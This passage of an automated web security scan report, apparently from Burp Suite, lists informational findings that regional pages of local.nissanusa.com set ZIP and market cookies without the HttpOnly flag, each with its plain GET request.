Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/atlanta-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=30303; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
localDMA=atlanta-area; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /atlanta-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.398. http://local.nissanusa.com/austin-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/austin-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=78701; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
localDMA=austin-area; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /austin-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.399. http://local.nissanusa.com/baltimore-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/baltimore-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:56 GMT
localZIP=21201; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
localDMA=baltimore-area; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /baltimore-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.400. http://local.nissanusa.com/boston-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/boston-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=02201; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
localDMA=boston-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.401. http://local.nissanusa.com/chicago-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/chicago-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=60601; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
localDMA=chicago-area; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chicago-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.402. http://local.nissanusa.com/cincinnati-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/cincinnati-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=45201; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
localDMA=cincinnati-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cincinnati-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.403. http://local.nissanusa.com/cleveland-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/cleveland-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=44101; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
localDMA=cleveland-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cleveland-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.404. http://local.nissanusa.com/columbus-oh-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/columbus-oh-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=43215; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
localDMA=columbus-oh-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /columbus-oh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.405. http://local.nissanusa.com/dallas-ft-worth-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/dallas-ft-worth-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=75201; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/
localDMA=dallas-ft-worth-area; expires=Sat, 05-Feb-2011 04:53:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas-ft-worth-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.406. http://local.nissanusa.com/denver-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/denver-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=80201; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/
localDMA=denver-area; expires=Sat, 05-Feb-2011 04:54:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /denver-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.407. http://local.nissanusa.com/harlingen-brownsville-tx-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/harlingen-brownsville-tx-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=78550; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/
localDMA=harlingen-brownsville-tx-area; expires=Sat, 05-Feb-2011 04:54:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /harlingen-brownsville-tx-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.408. http://local.nissanusa.com/harrisburg-lancaster-pa-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/harrisburg-lancaster-pa-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=17101; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/
localDMA=harrisburg-lancaster-pa-area; expires=Sat, 05-Feb-2011 04:52:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /harrisburg-lancaster-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.409. http://local.nissanusa.com/hartford-new-haven-ct-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/hartford-new-haven-ct-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=06101; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/
localDMA=hartford-new-haven-ct-area; expires=Sat, 05-Feb-2011 04:53:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hartford-new-haven-ct-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.410. http://local.nissanusa.com/honolulu-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/honolulu-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=96801; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/
localDMA=honolulu-area; expires=Sat, 05-Feb-2011 04:57:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /honolulu-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.411. http://local.nissanusa.com/houston-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/houston-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=77001; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/
localDMA=houston-area; expires=Sat, 05-Feb-2011 04:53:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /houston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.412. http://local.nissanusa.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

downScroll=deleted; expires=Fri, 29-Jan-2010 04:58:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.html HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:58:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:58:46 GMT
Content-Length: 15991
Connection: close
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:58:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.413. http://local.nissanusa.com/indianapolis-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/indianapolis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:08 GMT
localZIP=46201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
localDMA=indianapolis-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /indianapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.414. http://local.nissanusa.com/jacksonville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/jacksonville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=32201; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/
localDMA=jacksonville-area; expires=Sat, 05-Feb-2011 04:56:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jacksonville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.415. http://local.nissanusa.com/las-vegas-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/las-vegas-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=89101; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/
localDMA=las-vegas-area; expires=Sat, 05-Feb-2011 04:56:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /las-vegas-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.416. http://local.nissanusa.com/little-rock-pine-bluff-ar-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/little-rock-pine-bluff-ar-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=72201; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/
localDMA=little-rock-pine-bluff-ar-area; expires=Sat, 05-Feb-2011 04:54:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /little-rock-pine-bluff-ar-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.417. http://local.nissanusa.com/los-angeles-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/los-angeles-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=90001; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/
localDMA=los-angeles-area; expires=Sat, 05-Feb-2011 04:56:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /los-angeles-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.418. http://local.nissanusa.com/louisville-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/louisville-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /louisville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.419. http://local.nissanusa.com/miami-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/miami-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miami-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

11.420. http://local.nissanusa.com/milwaukee-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/milwaukee-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localZIP=53201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
localDMA=milwaukee-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /milwaukee-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

